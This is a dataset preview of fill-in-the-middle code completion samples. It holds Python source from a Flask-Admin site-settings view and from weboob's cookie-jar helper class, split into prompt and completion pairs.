prompt
large_stringlengths 72
9.34k
| completion
large_stringlengths 0
7.61k
|
---|---|
<|file_name|>setting.py<|end_file_name|><|fim▁begin|>#-*- coding: utf-8 -*-
from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView
from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig
import os
from PIL import Image
class SettingView(AuthenticateView, BaseView):
def saveProfileImage(self, filestorage):
buffer = filestorage.stream
buffer.seek(0)
image = Image.open(buffer)
image = ImageUtil.crop_image(image, 64)
current_app.logger.info(image)
dirpath = getDirectoryPath(current_app, '_settings')
filepath = os.path.join(dirpath, "profile.png")
image.save(filepath, optimize=True)
@expose('/', methods=('GET','POST'))
def index(self):
form = SettingForm()
if form.validate_on_submit():
if form.profile_img.data:
file = form.profile_img.data
self.saveProfileImage(file)
data = {}
data['site_title'] = form.title.data
data['site_subtitle'] = form.subtitle.data
data['site_author'] = form.author.data
data['site_author_profile'] = form.author_profile.data
data['enable_link_github'] = form.enable_link_github.data
data['enable_profile_img'] = form.enable_profile_img.data
data["ogp_app_id"] = form.ogp_app_id.data
data["ga_tracking_id"] = form.ga_tracking_id.data
data["enable_twittercard"] = form.enable_twittercard.data
data["twitter_username"] = form.twitter_username.data
data['display_poweredby'] = form.display_poweredby.data
if saveSiteConfig(current_app, data):
flash('Successfully saved.')
else:
<|fim_middle|>
else:
flash_errors(form)
data = loadSiteConfig(current_app)
form.title.data = data['site_title']
form.subtitle.data = data['site_subtitle']
form.author.data = data['site_author']
form.author_profile.data = data['site_author_profile']
form.enable_link_github.data = data['enable_link_github']
form.enable_profile_img.data = data['enable_profile_img']
form.ogp_app_id.data = data["ogp_app_id"]
form.ga_tracking_id.data = data["ga_tracking_id"]
form.enable_twittercard.data = data["enable_twittercard"]
form.twitter_username.data = data["twitter_username"]
form.display_poweredby.data = data['display_poweredby']
return self.render('admin/setting.html', form=form)
<|fim▁end|> | flash_errors('Oops. Save error.') |
<|file_name|>setting.py<|end_file_name|><|fim▁begin|>#-*- coding: utf-8 -*-
from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView
from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig
import os
from PIL import Image
class SettingView(AuthenticateView, BaseView):
def saveProfileImage(self, filestorage):
buffer = filestorage.stream
buffer.seek(0)
image = Image.open(buffer)
image = ImageUtil.crop_image(image, 64)
current_app.logger.info(image)
dirpath = getDirectoryPath(current_app, '_settings')
filepath = os.path.join(dirpath, "profile.png")
image.save(filepath, optimize=True)
@expose('/', methods=('GET','POST'))
def index(self):
form = SettingForm()
if form.validate_on_submit():
if form.profile_img.data:
file = form.profile_img.data
self.saveProfileImage(file)
data = {}
data['site_title'] = form.title.data
data['site_subtitle'] = form.subtitle.data
data['site_author'] = form.author.data
data['site_author_profile'] = form.author_profile.data
data['enable_link_github'] = form.enable_link_github.data
data['enable_profile_img'] = form.enable_profile_img.data
data["ogp_app_id"] = form.ogp_app_id.data
data["ga_tracking_id"] = form.ga_tracking_id.data
data["enable_twittercard"] = form.enable_twittercard.data
data["twitter_username"] = form.twitter_username.data
data['display_poweredby'] = form.display_poweredby.data
if saveSiteConfig(current_app, data):
flash('Successfully saved.')
else:
flash_errors('Oops. Save error.')
else:
<|fim_middle|>
data = loadSiteConfig(current_app)
form.title.data = data['site_title']
form.subtitle.data = data['site_subtitle']
form.author.data = data['site_author']
form.author_profile.data = data['site_author_profile']
form.enable_link_github.data = data['enable_link_github']
form.enable_profile_img.data = data['enable_profile_img']
form.ogp_app_id.data = data["ogp_app_id"]
form.ga_tracking_id.data = data["ga_tracking_id"]
form.enable_twittercard.data = data["enable_twittercard"]
form.twitter_username.data = data["twitter_username"]
form.display_poweredby.data = data['display_poweredby']
return self.render('admin/setting.html', form=form)
<|fim▁end|> | flash_errors(form) |
<|file_name|>setting.py<|end_file_name|><|fim▁begin|>#-*- coding: utf-8 -*-
from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView
from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig
import os
from PIL import Image
class SettingView(AuthenticateView, BaseView):
def <|fim_middle|>(self, filestorage):
buffer = filestorage.stream
buffer.seek(0)
image = Image.open(buffer)
image = ImageUtil.crop_image(image, 64)
current_app.logger.info(image)
dirpath = getDirectoryPath(current_app, '_settings')
filepath = os.path.join(dirpath, "profile.png")
image.save(filepath, optimize=True)
@expose('/', methods=('GET','POST'))
def index(self):
form = SettingForm()
if form.validate_on_submit():
if form.profile_img.data:
file = form.profile_img.data
self.saveProfileImage(file)
data = {}
data['site_title'] = form.title.data
data['site_subtitle'] = form.subtitle.data
data['site_author'] = form.author.data
data['site_author_profile'] = form.author_profile.data
data['enable_link_github'] = form.enable_link_github.data
data['enable_profile_img'] = form.enable_profile_img.data
data["ogp_app_id"] = form.ogp_app_id.data
data["ga_tracking_id"] = form.ga_tracking_id.data
data["enable_twittercard"] = form.enable_twittercard.data
data["twitter_username"] = form.twitter_username.data
data['display_poweredby'] = form.display_poweredby.data
if saveSiteConfig(current_app, data):
flash('Successfully saved.')
else:
flash_errors('Oops. Save error.')
else:
flash_errors(form)
data = loadSiteConfig(current_app)
form.title.data = data['site_title']
form.subtitle.data = data['site_subtitle']
form.author.data = data['site_author']
form.author_profile.data = data['site_author_profile']
form.enable_link_github.data = data['enable_link_github']
form.enable_profile_img.data = data['enable_profile_img']
form.ogp_app_id.data = data["ogp_app_id"]
form.ga_tracking_id.data = data["ga_tracking_id"]
form.enable_twittercard.data = data["enable_twittercard"]
form.twitter_username.data = data["twitter_username"]
form.display_poweredby.data = data['display_poweredby']
return self.render('admin/setting.html', form=form)
<|fim▁end|> | saveProfileImage |
<|file_name|>setting.py<|end_file_name|><|fim▁begin|>#-*- coding: utf-8 -*-
from flask import current_app, flash, url_for, request
from flask_admin import expose, BaseView
from logpot.admin.base import AuthenticateView, flash_errors
from logpot.admin.forms import SettingForm
from logpot.utils import ImageUtil, getDirectoryPath, loadSiteConfig, saveSiteConfig
import os
from PIL import Image
class SettingView(AuthenticateView, BaseView):
def saveProfileImage(self, filestorage):
buffer = filestorage.stream
buffer.seek(0)
image = Image.open(buffer)
image = ImageUtil.crop_image(image, 64)
current_app.logger.info(image)
dirpath = getDirectoryPath(current_app, '_settings')
filepath = os.path.join(dirpath, "profile.png")
image.save(filepath, optimize=True)
@expose('/', methods=('GET','POST'))
def <|fim_middle|>(self):
form = SettingForm()
if form.validate_on_submit():
if form.profile_img.data:
file = form.profile_img.data
self.saveProfileImage(file)
data = {}
data['site_title'] = form.title.data
data['site_subtitle'] = form.subtitle.data
data['site_author'] = form.author.data
data['site_author_profile'] = form.author_profile.data
data['enable_link_github'] = form.enable_link_github.data
data['enable_profile_img'] = form.enable_profile_img.data
data["ogp_app_id"] = form.ogp_app_id.data
data["ga_tracking_id"] = form.ga_tracking_id.data
data["enable_twittercard"] = form.enable_twittercard.data
data["twitter_username"] = form.twitter_username.data
data['display_poweredby'] = form.display_poweredby.data
if saveSiteConfig(current_app, data):
flash('Successfully saved.')
else:
flash_errors('Oops. Save error.')
else:
flash_errors(form)
data = loadSiteConfig(current_app)
form.title.data = data['site_title']
form.subtitle.data = data['site_subtitle']
form.author.data = data['site_author']
form.author_profile.data = data['site_author_profile']
form.enable_link_github.data = data['enable_link_github']
form.enable_profile_img.data = data['enable_profile_img']
form.ogp_app_id.data = data["ogp_app_id"]
form.ga_tracking_id.data = data["ga_tracking_id"]
form.enable_twittercard.data = data["enable_twittercard"]
form.twitter_username.data = data["twitter_username"]
form.display_poweredby.data = data['display_poweredby']
return self.render('admin/setting.html', form=form)
<|fim▁end|> | index |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.<|fim▁hole|>except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj<|fim▁end|> |
import requests.cookies
try:
import cookielib |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
<|fim_middle|>
<|fim▁end|> | @classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
<|fim_middle|>
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | """
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj) |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
<|fim_middle|>
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | """
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True) |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
<|fim_middle|>
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
<|fim_middle|>
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | """Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
<|fim_middle|>
<|fim▁end|> | new_cj = type(self)()
new_cj.update(self)
return new_cj |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
<|fim_middle|>
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
<|fim_middle|>
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def from_cookiejar(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
<|fim_middle|>
def copy(self):
new_cj = type(self)()
new_cj.update(self)
return new_cj
<|fim▁end|> | for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie |
<|file_name|>cookies.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright(C) 2014 Laurent Bachelier
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
import requests.cookies
try:
import cookielib
except ImportError:
import http.cookiejar as cookielib
__all__ = ['WeboobCookieJar']
class WeboobCookieJar(requests.cookies.RequestsCookieJar):
@classmethod
def <|fim_middle|>(klass, cj):
"""
Create a WeboobCookieJar from another CookieJar instance.
"""
return requests.cookies.merge_cookies(klass(), cj)
def export(self, filename):
"""
Export all cookies to a file, regardless of expiration, etc.
"""
cj = requests.cookies.merge_cookies(cookielib.LWPCookieJar(), self)
cj.save(filename, ignore_discard=True, ignore_expires=True)
def _cookies_from_attrs_set(self, attrs_set, request):
for tup in self._normalized_cookie_tuples(attrs_set):
cookie = self._cookie_from_cookie_tuple(tup, request)
if cookie:
yield cookie
def make_cookies(self, response, request):
"""Return sequence of Cookie objects extracted from response object."""
# get cookie-attributes for RFC 2965 and Netscape protocols
headers = response.info()
rfc2965_hdrs = headers.getheaders("Set-Cookie2")
ns_hdrs = headers.getheaders("Set-Cookie")
rfc2965 = self._policy.rfc2965
netscape = self._policy.netscape
if netscape:
for cookie in self._cookies_from_attrs_set(cookielib.parse_ns_headers(ns_hdrs), request):
self._process_rfc2109_cookies([cookie])
yield cookie
if rfc2965:
for cookie in self._cookies_from_attrs_set(cookielib.split_header_words(rfc2965_hdrs), request):
yield cookie
def copy(self):
